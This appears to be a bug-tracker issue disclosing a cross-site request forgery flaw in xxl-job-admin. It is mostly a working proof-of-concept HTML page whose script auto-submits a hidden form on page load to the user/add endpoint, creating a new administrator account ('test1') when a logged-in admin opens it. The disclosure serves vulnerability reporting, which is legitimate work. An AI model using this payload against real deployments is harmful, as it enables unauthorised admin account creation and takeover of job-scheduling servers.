There is a CSRF vulnerability that can add the administrator account #1921
Description
After the administrator logged in, open the following a page
poc:
one.html---add a admin
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='username' value='test1' />";
fields += "<input type='hidden' name='password' value='test1' />";
fields += "<input type='hidden' name='role' value='0' />";
fields += "<input type='hidden' name='permission' value='1' />";
var url = "http://172. 18.71.41:8090/xxl-job-admin/user/add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>